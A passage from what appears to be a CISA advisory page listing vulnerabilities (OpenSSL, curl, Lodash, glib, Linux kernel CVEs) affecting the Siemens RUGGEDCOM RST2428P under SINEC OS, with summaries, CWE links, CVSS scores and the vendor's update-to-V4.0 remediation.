<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-9231</a></h3>
<div class="csaf-accordion-content">
<p>Issue summary: A timing side-channel which could potentially allow remote recovery of the private key exists in the SM2 algorithm implementation on 64 bit ARM platforms. Impact summary: A timing side-channel in SM2 signature computations on 64 bit ARM platforms could allow recovering the private key by an attacker.. While remote key recovery over a network was not attempted by the reporter, timing measurements revealed a timing signal which may allow such an attack. OpenSSL does not directly support certificates with SM2 keys in TLS, and so this CVE is not relevant in most TLS contexts. However, given that it is possible to add support for such certificates via a custom provider, coupled with the fact that in such a custom provider context the private key may be recoverable via remote timing measurements, we consider this to be a Moderate severity issue. The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as SM2 is not an approved algorithm.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-9231">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/385.html">CWE-385 Covert Timing Channel</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-9232</a></h3>
<div class="csaf-accordion-content">
<p>Issue summary: An application using the OpenSSL HTTP client API functions may trigger an out-of-bounds read if the 'no_proxy' environment variable is set and the host portion of the authority component of the HTTP URL is an IPv6 address. Impact summary: An out-of-bounds read can trigger a crash which leads to Denial of Service for an application. The OpenSSL HTTP client API functions can be used directly by applications but they are also used by the OCSP client functions and CMP (Certificate Management Protocol) client implementation in OpenSSL. However the URLs used by these implementations are unlikely to be controlled by an attacker. In this vulnerable code the out of bounds read can only trigger a crash. Furthermore the vulnerability requires an attacker-controlled URL to be passed from an application to the OpenSSL function and the user has to have a 'no_proxy' environment variable set. For the aforementioned reasons the issue was assessed as Low severity. The vulnerable code was introduced in the following patch releases: 3.0.16, 3.1.8, 3.2.4, 3.3.3, 3.4.0 and 3.5.0. The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as the HTTP client implementation is outside the OpenSSL FIPS module boundary.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-9232">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/125.html">CWE-125 Out-of-bounds Read</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.9</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-10966</a></h3>
<div class="csaf-accordion-content">
<p>curl's code for managing SSH connections when SFTP was done using the wolfSSH powered backend was flawed and missed host verification mechanisms. This prevents curl from detecting MITM attackers and more.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-10966">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.3</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-13465</a></h3>
<div class="csaf-accordion-content">
<p>Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the _.unset and _.omit functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes. The issue permits deletion of properties but does not allow overwriting their original behavior. This issue is patched on 4.17.23</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-13465">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/1321.html">CWE-1321 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.2</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-13601</a></h3>
<div class="csaf-accordion-content">
<p>A heap-based buffer overflow problem was found in glib through an incorrect calculation of buffer size in the g_escape_uri_string() function. If the string to escape contains a very large number of unacceptable characters (which would need escaping), the calculation of the length of the escaped string could overflow, leading to a potential write off the end of the newly allocated string.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-13601">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/190.html">CWE-190 Integer Overflow or Wraparound</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39913</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: tcp_bpf: Call sk_msg_free() when tcp_bpf_send_verdict() fails to allocate psock-&gt;cork. syzbot reported the splat below. [0] The repro does the following: 1. Load a sk_msg prog that calls bpf_msg_cork_bytes(msg, cork_bytes) 2. Attach the prog to a SOCKMAP 3. Add a socket to the SOCKMAP 4. Activate fault injection 5. Send data less than cork_bytes At 5., the data is carried over to the next sendmsg() as it is smaller than the cork_bytes specified by bpf_msg_cork_bytes(). Then, tcp_bpf_send_verdict() tries to allocate psock-&gt;cork to hold the data, but this fails silently due to fault injection + __GFP_NOWARN. If the allocation fails, we need to revert the sk-&gt;sk_forward_alloc change done by sk_msg_alloc(). Let's call sk_msg_free() when tcp_bpf_send_verdict fails to allocate psock-&gt;cork. The "*copied" also needs to be updated such that a proper error can be returned to the caller, sendmsg. It fails to allocate psock-&gt;cork. Nothing has been corked so far, so this patch simply sets "*copied" to 0. [0]: WARNING: net/ipv4/af_inet.c:156 at inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156, CPU#1: syz-executor/5983 Modules linked in: CPU: 1 UID: 0 PID: 5983 Comm: syz-executor Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/12/2025 RIP: 0010:inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156 Code: 0f 0b 90 e9 62 fe ff ff e8 7a db b5 f7 90 0f 0b 90 e9 95 fe ff ff e8 6c db b5 f7 90 0f 0b 90 e9 bb fe ff ff e8 5e db b5 f7 90 &lt;0f&gt; 0b 90 e9 e1 fe ff ff 89 f9 80 e1 07 80 c1 03 38 c1 0f 8c 9f fc RSP: 0018:ffffc90000a08b48 EFLAGS: 00010246 RAX: ffffffff8a09d0b2 RBX: dffffc0000000000 RCX: ffff888024a23c80 RDX: 0000000000000100 RSI: 0000000000000fff RDI: 0000000000000000 RBP: 0000000000000fff R08: ffff88807e07c627 R09: 1ffff1100fc0f8c4 R10: dffffc0000000000 R11: ffffed100fc0f8c5 R12: ffff88807e07c380 R13: dffffc0000000000 R14: ffff88807e07c60c R15: 1ffff1100fc0f872 FS: 00005555604c4500(0000) GS:ffff888125af1000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00005555604df5c8 CR3: 0000000032b06000 CR4: 00000000003526f0 Call Trace: __sk_destruct+0x86/0x660 net/core/sock.c:2339 rcu_do_batch kernel/rcu/tree.c:2605 [inline] rcu_core+0xca8/0x1770 kernel/rcu/tree.c:2861 handle_softirqs+0x286/0x870 kernel/softirq.c:579 __do_softirq kernel/softirq.c:613 [inline] invoke_softirq kernel/softirq.c:453 [inline] __irq_exit_rcu+0xca/0x1f0 kernel/softirq.c:680 irq_exit_rcu+0x9/0x30 kernel/softirq.c:696 instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1052 [inline] sysvec_apic_timer_interrupt+0xa6/0xc0 arch/x86/kernel/apic/apic.c:1052</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39913">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40214</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: af_unix: Initialise scc_index in unix_add_edge(). Quang Le reported that the AF_UNIX GC could garbage-collect a receive queue of an alive in-flight socket, with a nice repro. The repro consists of three stages. 1) 1-a. Create a single cyclic reference with many sockets 1-b. close() all sockets 1-c. Trigger GC 2) 2-a. Pass sk-A to an embryo sk-B 2-b. Pass sk-X to sk-X 2-c. Trigger GC 3) 3-a. accept() the embryo sk-B 3-b. Pass sk-B to sk-C 3-c. close() the in-flight sk-A 3-d. Trigger GC As of 2-c, sk-A and sk-X are linked to unix_unvisited_vertices, and unix_walk_scc() groups them into two different SCCs: unix_sk(sk-A)-&gt;vertex-&gt;scc_index = 2 (UNIX_VERTEX_INDEX_START) unix_sk(sk-X)-&gt;vertex-&gt;scc_index = 3 Once GC completes, unix_graph_grouped is set to true. Also, unix_graph_maybe_cyclic is set to true due to sk-X's cyclic self-reference, which makes close() trigger GC. At 3-b, unix_add_edge() allocates unix_sk(sk-B)-&gt;vertex and links it to unix_unvisited_vertices. unix_update_graph() is called at 3-a. and 3-b., but neither unix_graph_grouped nor unix_graph_maybe_cyclic is changed because both sk-B's listener and sk-C are not in-flight. 3-c decrements sk-A's file refcnt to 1. Since unix_graph_grouped is true at 3-d, unix_walk_scc_fast() is finally called and iterates 3 sockets sk-A, sk-B, and sk-X: sk-A -&gt; sk-B (-&gt; sk-C) sk-X -&gt; sk-X This is totally fine. All of them are not yet close()d and should be grouped into different SCCs. However, unix_vertex_dead() misjudges that sk-A and sk-B are in the same SCC and sk-A is dead. unix_sk(sk-A)-&gt;scc_index == unix_sk(sk-B)-&gt;scc_index &lt;-- Wrong! &amp;&amp; sk-A's file refcnt == unix_sk(sk-A)-&gt;vertex-&gt;out_degree ^-- 1 in-flight count for sk-B -&gt; sk-A is dead !? The problem is that unix_add_edge() does not initialise scc_index. Stage 1) is used for heap spraying, making a newly allocated vertex have vertex-&gt;scc_index == 2 (UNIX_VERTEX_INDEX_START) set by unix_walk_scc() at 1-c. Let's track the max SCC index from the previous unix_walk_scc() call and assign the max + 1 to a new vertex's scc_index. This way, we can continue to avoid Tarjan's algorithm while preventing misjudgments.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40214">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40248</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: vsock: Ignore signal/timeout on connect() if already established During connect(), acting on a signal/timeout by disconnecting an already established socket leads to several issues: 1. connect() invoking vsock_transport_cancel_pkt() -&gt; virtio_transport_purge_skbs() may race with sendmsg() invoking virtio_transport_get_credit(). This results in a permanently elevated `vvs-&gt;bytes_unsent`. Which, in turn, confuses the SOCK_LINGER handling. 2. connect() resetting a connected socket's state may race with socket being placed in a sockmap. A disconnected socket remaining in a sockmap breaks sockmap's assumptions. And gives rise to WARNs. 3. connect() transitioning SS_CONNECTED -&gt; SS_UNCONNECTED allows for a transport change/drop after TCP_ESTABLISHED. Which poses a problem for any simultaneous sendmsg() or connect() and may result in a use-after-free/null-ptr-deref. Do not disconnect socket on signal/timeout. Keep the logic for unconnected sockets: they don't linger, can't be placed in a sockmap, are rejected by sendmsg().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40248">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40250</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net/mlx5: Clean up only new IRQ glue on request_irq() failure The mlx5_irq_alloc() function can inadvertently free the entire rmap and end up in a crash[1] when the other threads tries to access this, when request_irq() fails due to exhausted IRQ vectors. This commit modifies the cleanup to remove only the specific IRQ mapping that was just added. This prevents removal of other valid mappings and ensures precise cleanup of the failed IRQ allocation's associated glue object. Note: This error is observed when both fwctl and rds configs are enabled. [1] mlx5_core 0000:05:00.0: Successfully registered panic handler for port 1 mlx5_core 0000:05:00.0: mlx5_irq_alloc:293:(pid 66740): Failed to request irq. err = -28 infiniband mlx5_0: mlx5_ib_test_wc:290:(pid 66740): Error -28 while trying to test write-combining support mlx5_core 0000:05:00.0: Successfully unregistered panic handler for port 1 mlx5_core 0000:06:00.0: Successfully registered panic handler for port 1 mlx5_core 0000:06:00.0: mlx5_irq_alloc:293:(pid 66740): Failed to request irq. err = -28 infiniband mlx5_0: mlx5_ib_test_wc:290:(pid 66740): Error -28 while trying to test write-combining support mlx5_core 0000:06:00.0: Successfully unregistered panic handler for port 1 mlx5_core 0000:03:00.0: mlx5_irq_alloc:293:(pid 28895): Failed to request irq. err = -28 mlx5_core 0000:05:00.0: mlx5_irq_alloc:293:(pid 28895): Failed to request irq. err = -28 general protection fault, probably for non-canonical address 0xe277a58fde16f291: 0000 [#1] SMP NOPTI RIP: 0010:free_irq_cpu_rmap+0x23/0x7d Call Trace: ? show_trace_log_lvl+0x1d6/0x2f9 ? show_trace_log_lvl+0x1d6/0x2f9 ? mlx5_irq_alloc.cold+0x5d/0xf3 [mlx5_core] ? __die_body.cold+0x8/0xa ? die_addr+0x39/0x53 ? exc_general_protection+0x1c4/0x3e9 ? dev_vprintk_emit+0x5f/0x90 ? asm_exc_general_protection+0x22/0x27 ? free_irq_cpu_rmap+0x23/0x7d mlx5_irq_alloc.cold+0x5d/0xf3 [mlx5_core] irq_pool_request_vector+0x7d/0x90 [mlx5_core] mlx5_irq_request+0x2e/0xe0 [mlx5_core] mlx5_irq_request_vector+0xad/0xf7 [mlx5_core] comp_irq_request_pci+0x64/0xf0 [mlx5_core] create_comp_eq+0x71/0x385 [mlx5_core] ? mlx5e_open_xdpsq+0x11c/0x230 [mlx5_core] mlx5_comp_eqn_get+0x72/0x90 [mlx5_core] ? xas_load+0x8/0x91 mlx5_comp_irqn_get+0x40/0x90 [mlx5_core] mlx5e_open_channel+0x7d/0x3c7 [mlx5_core] mlx5e_open_channels+0xad/0x250 [mlx5_core] mlx5e_open_locked+0x3e/0x110 [mlx5_core] mlx5e_open+0x23/0x70 [mlx5_core] __dev_open+0xf1/0x1a5 __dev_change_flags+0x1e1/0x249 dev_change_flags+0x21/0x5c do_setlink+0x28b/0xcc4 ? __nla_parse+0x22/0x3d ? inet6_validate_link_af+0x6b/0x108 ? cpumask_next+0x1f/0x35 ? __snmp6_fill_stats64.constprop.0+0x66/0x107 ? __nla_validate_parse+0x48/0x1e6 __rtnl_newlink+0x5ff/0xa57 ? kmem_cache_alloc_trace+0x164/0x2ce rtnl_newlink+0x44/0x6e rtnetlink_rcv_msg+0x2bb/0x362 ? __netlink_sendskb+0x4c/0x6c ? netlink_unicast+0x28f/0x2ce ? rtnl_calcit.isra.0+0x150/0x146 netlink_rcv_skb+0x5f/0x112 netlink_unicast+0x213/0x2ce netlink_sendmsg+0x24f/0x4d9 __sock_sendmsg+0x65/0x6a ____sys_sendmsg+0x28f/0x2c9 ? import_iovec+0x17/0x2b ___sys_sendmsg+0x97/0xe0 __sys_sendmsg+0x81/0xd8 do_syscall_64+0x35/0x87 entry_SYSCALL_64_after_hwframe+0x6e/0x0 RIP: 0033:0x7fc328603727 Code: c3 66 90 41 54 41 89 d4 55 48 89 f5 53 89 fb 48 83 ec 10 e8 0b ed ff ff 44 89 e2 48 89 ee 89 df 41 89 c0 b8 2e 00 00 00 0f 05 &lt;48&gt; 3d 00 f0 ff ff 77 35 44 89 c7 48 89 44 24 08 e8 44 ed ff ff 48 RSP: 002b:00007ffe8eb3f1a0 EFLAGS: 00000293 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 000000000000000d RCX: 00007fc328603727 RDX: 0000000000000000 RSI: 00007ffe8eb3f1f0 RDI: 000000000000000d RBP: 00007ffe8eb3f1f0 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000293 R12: 0000000000000000 R13: 00000000000 ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40250">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40251</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: devlink: rate: Unset parent pointer in devl_rate_nodes_destroy The function devl_rate_nodes_destroy is documented to "Unset parent for all rate objects". However, it was only calling the driver-specific `rate_leaf_parent_set` or `rate_node_parent_set` ops and decrementing the parent's refcount, without actually setting the `devlink_rate-&gt;parent` pointer to NULL. This leaves a dangling pointer in the `devlink_rate` struct, which cause refcount error in netdevsim[1] and mlx5[2]. In addition, this is inconsistent with the behavior of `devlink_nl_rate_parent_node_set`, where the parent pointer is correctly cleared. This patch fixes the issue by explicitly setting `devlink_rate-&gt;parent` to NULL after notifying the driver, thus fulfilling the function's documented behavior for all rate objects. [1] repro steps: echo 1 &gt; /sys/bus/netdevsim/new_device devlink dev eswitch set netdevsim/netdevsim1 mode switchdev echo 1 &gt; 